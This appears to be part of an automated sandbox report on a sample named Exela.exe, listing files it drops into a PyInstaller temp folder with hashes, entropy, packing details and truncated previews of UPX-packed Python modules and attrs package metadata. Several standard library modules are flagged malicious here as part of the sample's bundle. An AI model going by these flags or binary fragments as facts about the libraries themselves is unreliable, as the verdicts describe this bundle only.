                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.A.>...>...>...F2..>...B...>...B...>...B...>...B...>..iB...>...L...>...D...>...>..Q>..iB...>..iB...>..iB^..>..iB...>..Rich.>..........................PE..d.../..c.........." ...".P..........p........................................@............`..........................................;..P....9.......0.......................;......................................p*..@...........................................UPX0....................................UPX1.....P.......L..................@....rsrc........0.......P..............@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_lzma.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):86392
                                                                                                  Entropy (8bit):7.91766123352546
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:EnKvmqFMCNL6eKmtYs76LBlBqLBxcZiV6IHxdc/k4Nc+VI7e1gf7SyJPxs:kqdLCOz76LBl4VxYcdc/11I7e1gfvxs
                                                                                                  MD5:8EDBEECCB6F3DBB09389D99D45DB5542
                                                                                                  SHA1:F7E7AF2851A5BF22DE79A24FE594B5C0435FCA8A
                                                                                                  SHA-256:90701973BE6B23703E495F6A145BAE251A7BB066D3C5F398EC42694FD06A069F
                                                                                                  SHA-512:2A8BF60F2280B9A947578BD7FD49C3ACE8E010A3D4B38E370EDB511EA0E125DF688BBAC369D6A3CEC9D285A1FA2AD2DAC18A0EF30FDA46E49A9440418581E501
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.J[&.$.&.$.&.$./..".$.i.%.$.$.i.!.*.$.i. ...$.i.'.%.$...%.%.$...%.$.$.&.%.C.$...)...$...$.'.$.....'.$...&.'.$.Rich&.$.........PE..d...B..c.........." ...". ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_multiprocessing.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25984
                                                                                                  Entropy (8bit):7.488187631590162
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:GQy6HNbpr+8C6LSf93zpALbI7Rt2fYiSyvPPxWEa5Z:L9+8FKReLbI7Rt2f7SynPxeZ
                                                                                                  MD5:4FBC5FD5DA9DA74C04FE0374387B34D3
                                                                                                  SHA1:1E9C98DB0486F98FB7D8EB9FA57A949494B649B5
                                                                                                  SHA-256:B2347790C87052623710382D3178887F68A79618D6DA5174909F46B169236950
                                                                                                  SHA-512:CE87D4512C2AB7C1AD7986E8E1FE790615AE39C7667D234DFC09026EE7E1518B3BFBF7974612811DB0C3E5654B35B54E118E23E624BEBE027A51D2C8F2A4652A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$Z*.E4y.E4y.E4y.=.y.E4y.95x.E4y.91x.E4y.90x.E4y.97x.E4yS95x.E4y.E5y.E4y?75x.E4yS99x.E4yS94x.E4yS9.y.E4yS96x.E4yRich.E4y........................PE..d...+..c.........." ...".0..........p.....................................................`.........................................4...`....................`..........................................................@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_overlapped.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):31104
                                                                                                  Entropy (8bit):7.628398010929569
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:nk8GDYwKGtevarixdHpgTzI7st2xYiSyvxPxWEa:8ETibTzI7st2x7SypPx
                                                                                                  MD5:5C1441F6EE11632183A83DAC2D22853B
                                                                                                  SHA1:EEF732FF4BAB9EA5C8FFFB6A93C47CFC8E64DAE2
                                                                                                  SHA-256:104E0B0E0E9FEC9EB6438683296FEEBA298D5F23B02D2080577FC87FFEC67ACF
                                                                                                  SHA-512:E41D3433754A8A3D2C572BB7F3902C0D37CBA2E6F3307F0E6DFED316A22B11EF7E52A73C30085FA89FCFF603E4B76858ABE761217C320E38FA2EB95D1777B595
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........({..F(..F(..F(...(..F(..G)..F(..C)..F(..B)..F(..E)..F(..G)..F(..G(..F(c.G)..F(c.B)..F(..K)..F(..F)..F(...(..F(..D)..F(Rich..F(................PE..d...-..c.........." ...".@................................................................`.........................................x...X...............................................................................@...........................................UPX0....................................UPX1.....@.......@..................@....rsrc................D..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_queue.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24960
                                                                                                  Entropy (8bit):7.447047314489284
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:pSxw19p9opxfI77U2bYiSyvlfUvPxWEl:pj1HgfI77U2b7SyOvPx
                                                                                                  MD5:5C4C43763FB1A796134AA5734905C891
                                                                                                  SHA1:44A5E1AE4806406A239129D77888BD87D291A410
                                                                                                  SHA-256:4EDC80E7D331BA0E9338431D407157181190F995821D1CD24F7A7AA2422ECE0C
                                                                                                  SHA-512:07BEC7E4A85E76CFAB2C21776B50EE2BD0454835FCB43B573DEE757ECA24CBEB4530784BAE07DE3BE90820CEE6D72023D9DED395D4F1A4931971DB247DC1A71E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._ZF.1.F.1.F.1.O..D.1...0.D.1...4.J.1...5.N.1...2.E.1...0.E.1...0.D.1.F.0...1...<.G.1...1.G.1.....G.1...3.G.1.RichF.1.........PE..d...&..c.........." ...".0..........`.....................................................`.............................................L.......P............`..............<.......................................`...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_socket.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):42880
                                                                                                  Entropy (8bit):7.696654190779553
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:EL7Syo5lzOt+ufVwPVXahccu0D+gFiPnmJqpE2SI7QwbmGYiSyvb9ZPxWEl:MkbzcKNGu0yXwN2SI7QwbmG7Syj/Px
                                                                                                  MD5:53E72716073038C1DD1DB65BFDB1254C
                                                                                                  SHA1:7BF220A02A3B51AA51300B3A9EA7FA48358CA161
                                                                                                  SHA-256:E1FB6927BA2ED014D0AC750AF0EE0BB3D49487DD6920848937259606E1E92E1D
                                                                                                  SHA-512:C10D91B6EC82402B0EB05DC31A4703C999F4988E88204B695E009FAE5FDCC61E8A6DC4D2879ECF2BABC030224048AFD2F256B9E7F5C5B6F28762047813BE0941
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z..{4..{4..{4......{4...5..{4...1..{4...0..{4...7..{4.U.5..{4..{5.\{4.9.5..{4.U.9..{4.U.4..{4.U....{4.U.6..{4.Rich.{4.........................PE..d...0..c.........." ...".p..........0m....................................................`.............................................P.......h............ ..l...........X.......................................@y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_sqlite3.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):50048
                                                                                                  Entropy (8bit):7.761194500415829
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:E8Mdv1OCWk0z+q3QCjbouWxI75Qr27SyDPx:XQO00zrrvbQI75Qr2Nx
                                                                                                  MD5:E7D68DF8F65FBB0298A45519E2336F32
                                                                                                  SHA1:AD3C84AD7EB75A61F287B1BA9FD2801567E39B6D
                                                                                                  SHA-256:2473EBAF52723C3751A12117EBBE974E50ECDAEB40B282A12BA4E6AA98492E79
                                                                                                  SHA-512:626204685E9B95310ABA51BE4A8ABAF3B6E152FA35902F64F837303FC4011A4518EE393047CEB45BF377E9D965D169C92BFBB6673475150E159C59B7857BA03E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..|...|...|...u...z...3...~...3.~.}...3...q...3...t...3..........y.......~...|..........u......}....|.}......}...Rich|...........PE..d...[..c.........." ...".........@..0....P................................................`.............................................P.......4............`..............(.......................................0...@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_ssl.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):62328
                                                                                                  Entropy (8bit):7.84875298158187
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:wedJItp3BP6kGsJMthwMtbyG68yTyI7t7QO67SycPxu:98tVBPpGsUt+uyuI7t7Q/+xu
                                                                                                  MD5:7E9D95AC47A2284706318656B4F711D3
                                                                                                  SHA1:F085104709201C6E64635AEACF1DA51599054E55
                                                                                                  SHA-256:38DCB3D0F217785B39C03D4C949DD1E04B70E9EADE8A4AD83F026390684059C9
                                                                                                  SHA-512:294A5148D8FCDDABD177B776617DA7720D9876AC2A1CDF8DD7B9489F0F719600A634346CDFA07DA66588DE885B0A64D8CCCDE4D47EDBF6305BD2AF44EE209118
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,z..h.gLh.gLh.gLac.Ln.gL'gfMj.gL'gbMe.gL'gcM`.gL'gdMk.gL.gfMj.gL.afMl.gLh.fL..gL.ifMo.gL.gjMj.gL.ggMi.gL.g.Li.gL.geMi.gLRichh.gL................PE..d...3..c.........." ..."............ .....................................................`.........................................p...d....................P......................................................0...@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_uuid.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22400
                                                                                                  Entropy (8bit):7.353729594367488
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:2bjUslT24oGuNZa7gJXTwI7ewWY8IYiSy1pCQDMaPxh8E9VF0Nyvzo:Mj3lcNpDwI7ewW4YiSyvfPxWEx
                                                                                                  MD5:59CFD9669367517B384922B2485CB6A7
                                                                                                  SHA1:1BD44298543204D61D4EFD2CD3980AD01071360D
                                                                                                  SHA-256:E02BFAD84786560B624EFD56DF55C88A4FFBD6C7CFC728BF68B6401AA10F849F
                                                                                                  SHA-512:D0DD041D8493C7C19DB01EA8477981148726796CE2AB58D3193064123319BD5B68FD57871D1DB0AAA08D07F78AB96A3D343051C33FFD406E96B921248EA32665
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;$p^ZJ#^ZJ#^ZJ#W".#\ZJ#.&K"\ZJ#.&O"RZJ#.&N"VZJ#.&I"]ZJ#.&K"\ZJ#.(K"[ZJ#^ZK#tZJ#.&B"_ZJ#.&J"_ZJ#.&.#_ZJ#.&H"_ZJ#Rich^ZJ#................PE..d...+..c.........." ...". .......`.......p................................................`.........................................8...L....................@..........................................................@...........................................UPX0.....`..............................UPX1..... ...p......................@....rsrc................"..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_parser.cp310-win_amd64.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):82944
                                                                                                  Entropy (8bit):7.938137486494663
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:hnpRMSuB4GHqEE5Pr5YvebAN4QYt5dFcOGuj42OfIPZXSWItd2albgEM9xI:Vf04GXOzCvebAN4dia42OfIPJSzt
                                                                                                  MD5:23DF1D1A4BFD29C6C0F89D1A42BBECBB
                                                                                                  SHA1:B8E5686724223BD5E8ED0B7A3517CDC3005BE66A
                                                                                                  SHA-256:10F7967A3C574CAEA10FD5A94C9B6EBA405ED6AFEC402969424C143566593ADC
                                                                                                  SHA-512:75A455A9EB96BD52F0D795188A1120EE14D36944C331D97B4C3DA837238BD2928CFF29DF27C0F17093022D976C0C2E54189BABD94C6DC927AC325216C340481A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... |.Q |.Q |.Q).iQ&|.Q1..P"|.QR..P"|.Q...P#|.Q |.Q.|.Q1..P$|.Q1..P(|.Q1..P,|.Q...P%|.Q...P!|.Q...Q!|.Q...P!|.QRich |.Q........................PE..d....'cg.........." ...*.@.......p.. .....................................................`..................................................................@..............\....................................... ...@...........................................UPX0.....p..............................UPX1.....@.......8..................@....rsrc................<..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_writer.cp310-win_amd64.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25088
                                                                                                  Entropy (8bit):7.665312753734398
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:VCaWHS6ittmPMLRUZ+wXAMqCwTgs4A8mvcsxjntRNQi0VZa7gJXg4G:saWHSVtdtaQMvwTx4G7NYpQ
                                                                                                  MD5:B0E8CBF64F3728EEE12E6E0756E67C95
                                                                                                  SHA1:71BC5AE8847DAC5D0737E6321833A37DA655D538
                                                                                                  SHA-256:7A931C3108173C4D8CC4ED7304414FCD3BA67CEFF81F84506DCDDA8979F5F33B
                                                                                                  SHA-512:622126F5A1FC5E275680BB64648A8CAC6A5EAF3E7D6A262F0002AFC26CEC6D9C3ADDBBA257626AC54189B7F85E5ABDFC3809954CE0437046FC64B643A4E8CB5A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..T&f..&f..&f../.].$f..7...$f..T...$f..7...%f..7....f..7...*f......%f..&f...f......'f......'f....1.'f......'f..Rich&f..................PE..d....'cg.........." ...*.`...........[....................................................`.........................................@r..h....p..P....p.......................r.......................................g..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc........p.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\mask.cp310-win_amd64.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19968
                                                                                                  Entropy (8bit):7.541773953506371
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:9POtpIsoNR0zkLHI7KOqPwY8jT8Xr8MhHHxZa7gJXkoNT:9PO4hR0oLLwY7xp0o
                                                                                                  MD5:2B5D378AFB9AEB031ED1A84F5C216291
                                                                                                  SHA1:7955E2EC7E7FFA13E58AF098D37C480C8F23CCAD
                                                                                                  SHA-256:1D44B957609599FDF3115BB47BD668F560B63D4D84C74C1F7BF1F3DC05246D6A
                                                                                                  SHA-512:9102A95C57024AFDDB67B6500CE1606A2BF5923AA66F67E21FEC23C1EFB1C9A0CD77C55417B25C7CDBCDA119CD817EA4219A1FE321A2F9300F8BFFA99D8B0A31
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f..T"f.."f.."f..+.E. f..3... f..P... f..3...!f..3...*f..3....f......!f.."f...f......#f......#f....).#f......#f..Rich"f..........................PE..d....'cg.........." ...*.P................................................................`.........................................@...X.......P.......................................................................@...........................................UPX0....................................UPX1.....P.......F..................@....rsrc................J..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\reader_c.cp310-win_amd64.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):62976
                                                                                                  Entropy (8bit):7.91306866032889
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:ftmXfEKkKf3+XUbQdfdIvuVbSkTr9j4sCx74CKN3U/8o3rq3RSXqwnqpLL8gZET7:MXfEzPSGSkTrtGx7BWOv7q3RAF3gZEf
                                                                                                  MD5:2CB730463EE9A2360B568BB54FF283B1
                                                                                                  SHA1:E63B5D62D281F153AB2C3487F4423BEC259E1BD5
                                                                                                  SHA-256:17B026C18DC25B2F8842DA41484E39C8E92BD3FF9FE0F6D03F9FDC389991E7AE
                                                                                                  SHA-512:A7891BA2619CC6910C47FFAC153BA31A3B17F67F08654F7A1FED380B1F4951673573F5E5A59E45E4EDC432B135DBB57BB82C3B4CBDFC265D0DAA6FCA587AB732
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RX.E.9...9...9...AG..9.......9..d....9.......9.......9.......9...L...9...9...9.......9.......9....+..9.......9..Rich.9..........PE..d....'cg.........." ...*............`.... ................................... ............`.............................................`...........................................................................`...@...........................................UPX0....................................UPX1......... ......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info\INSTALLER

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):1.5
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Mn:M
                                                                                                  MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                  SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                  SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                  SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                  Malicious:false
                                                                                                  Preview:pip.

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info\METADATA

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (411)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11654
                                                                                                  Entropy (8bit):5.225237436297847
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:WusRfi65kQk+kOkKkegJoiWiG/JDPVA1yzBdvrrOmoKT30oEJdQ/0G6lWg+JdQVg:WusQpLb3/oiWZ/JDP/zBdTrHoKD9gA6i
                                                                                                  MD5:0E682E7854FE836CAD441326AB36D36D
                                                                                                  SHA1:3EFAD7961F8F2DFB0A22A1EEABD3A92B9DA0AB23
                                                                                                  SHA-256:7FD8611027805324BB89EC073D1B8C2C3CB5B6927ABF2CBC47F4CA5270A6880F
                                                                                                  SHA-512:54FD3B0C98DCE7C11691D08CA22C9C8A74CD838D03723DDA3FBAC326EFC2550EDB892F9D45AA3956C9C5C35B8C20FE096F6A002DEE07150B437A1E7E76AC175A
                                                                                                  Malicious:false
                                                                                                  Preview:Metadata-Version: 2.4.Name: attrs.Version: 24.3.0.Summary: Classes Without Boilerplate.Project-URL: Documentation, https://www.attrs.org/.Project-URL: Changelog, https://www.attrs.org/en/stable/changelog.html.Project-URL: GitHub, https://github.com/python-attrs/attrs.Project-URL: Funding, https://github.com/sponsors/hynek.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi.Author-email: Hynek Schlawack <hs@ox.cx>.License-Expression: MIT.License-File: LICENSE.Keywords: attribute,boilerplate,class.Classifier: Development Status :: 5 - Production/Stable.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3.13.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifie

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info\RECORD

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3556
                                                                                                  Entropy (8bit):5.799825470471552
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:QtuulxJPJooDwKVE50dwB18XbXm9qG3R5YC3XFfkGD+qLtxO:+uIld418rXGPRWGXkiO
                                                                                                  MD5:72C9F466183F7EAE813F25ED47198941
                                                                                                  SHA1:7498FAE0D90F7F64D6C954849225E82C8F1BAC92
                                                                                                  SHA-256:A237DE627EE31B429FED81BDFF4FA5B5B22BC979A2580E1205ACAEDC78761143
                                                                                                  SHA-512:6ED2A1293FA6E27CA3BDAA95AF38E3B2299D1D77B7E0FB2D67552CD8F3ACAEE5BE94D4F3F562E6BC42E6F6C7FC9D302C7BD5B14A1243EF86979E077242173C35
                                                                                                  Malicious:false
                                                                                                  Preview:attr/__init__.py,sha256=fOYIvt1eGSqQre4uCS3sJWKZ0mwAuC8UD6qba5OS9_U,2057..attr/__init__.pyi,sha256=QIXnnHPoucmDWkbpNsWTP-cgJ1bn8le7DjyRa_wYdew,11281..attr/__pycache__/__init__.cpython-310.pyc,,..attr/__pycache__/_cmp.cpython-310.pyc,,..attr/__pycache__/_compat.cpython-310.pyc,,..attr/__pycache__/_config.cpython-310.pyc,,..attr/__pycache__/_funcs.cpython-310.pyc,,..attr/__pycache__/_make.cpython-310.pyc,,..attr/__pycache__/_next_gen.cpython-310.pyc,,..attr/__pycache__/_version_info.cpython-310.pyc,,..attr/__pycache__/converters.cpython-310.pyc,,..attr/__pycache__/exceptions.cpython-310.pyc,,..attr/__pycache__/filters.cpython-310.pyc,,..attr/__pycache__/setters.cpython-310.pyc,,..attr/__pycache__/validators.cpython-310.pyc,,..attr/_cmp.py,sha256=3umHiBtgsEYtvNP_8XrQwTCdFoZIX4DEur76N-2a3X8,4123..attr/_cmp.pyi,sha256=U-_RU_UZOyPUEQzXE6RMYQQcjkZRY25wTH99sN0s7MM,368..attr/_compat.py,sha256=4hlXbWhdDjQCDK6FKF1EgnZ3POiHgtpp54qE0nxaGHg,2704..attr/_config.py,sha256=dGq3xR6fgZEF6UBt_L0T-eUHIB4i43

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info\WHEEL

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):87
                                                                                                  Entropy (8bit):4.730668933656452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:RtEeXAaCTShvxP+tPCCfA5I:Rt2PehvxWBB3
                                                                                                  MD5:E2FCB0AD9EA59332C808928B4B439E7A
                                                                                                  SHA1:07311208D4849F821E8AF25A89A9985C4503FBD8
                                                                                                  SHA-256:AAD0B0A12256807936D52D4A6F88A1773236AE527564A688BAB4E3FE780E8724
                                                                                                  SHA-512:D4CB3CA64D69678959C4F59B4D1CB992E8E2E046A6ACB92341FD30B8CE862BD81A48CBFA09EC9AE2E735FFEC5C12D246D1593A859615ADEE10984635A9BA8AF9
                                                                                                  Malicious:false
                                                                                                  Preview:Wheel-Version: 1.0.Generator: hatchling 1.27.0.Root-Is-Purelib: true.Tag: py3-none-any.

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info\licenses\LICENSE

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1109
                                                                                                  Entropy (8bit):5.104415762129373
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:bGf8rUrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bW8rUaJHlxE3dQHOs5exm3ogFh
                                                                                                  MD5:5E55731824CF9205CFABEAB9A0600887
                                                                                                  SHA1:243E9DD038D3D68C67D42C0C4BA80622C2A56246
                                                                                                  SHA-256:882115C95DFC2AF1EEB6714F8EC6D5CBCABF667CAFF8729F42420DA63F714E9F
                                                                                                  SHA-512:21B242BF6DCBAFA16336D77A40E69685D7E64A43CC30E13E484C72A93CD4496A7276E18137DC601B6A8C3C193CB775DB89853ECC6D6EB2956DEEE36826D5EBFE
                                                                                                  Malicious:false
                                                                                                  Preview:The MIT License (MIT)..Copyright (c) 2015 Hynek Schlawack and the attrs contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                  Category:dropped
                                                                                                  Size (bytes):880537
                                                                                                  Entropy (8bit):5.683031237524772
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:lgYJu4KXWyBC6S4IEa8A4a2YSZdOVwx/fpEh+rtSLMN2:lgYJiVBFLa2LuVwx/fpEh++MN2
                                                                                                  MD5:9B62388394601020BD24FA9E7B4E9E0A
                                                                                                  SHA1:06023DAF857014770FF38D4EBBD600BA03109F28
                                                                                                  SHA-256:A6993DB44FDE43C8FDBF3512DB50060812924C95F6F60AEB80913380A0B4F3E1
                                                                                                  SHA-512:AC1BFEBB36D844A0C5909B34FC1100FF2D1F88A0B71A75AA27B4D2B281A90DCB05259B874E4FDB300572A0C029DB96E507B5CAEFDAF03CC32050DC2B728C654B
                                                                                                  Malicious:false
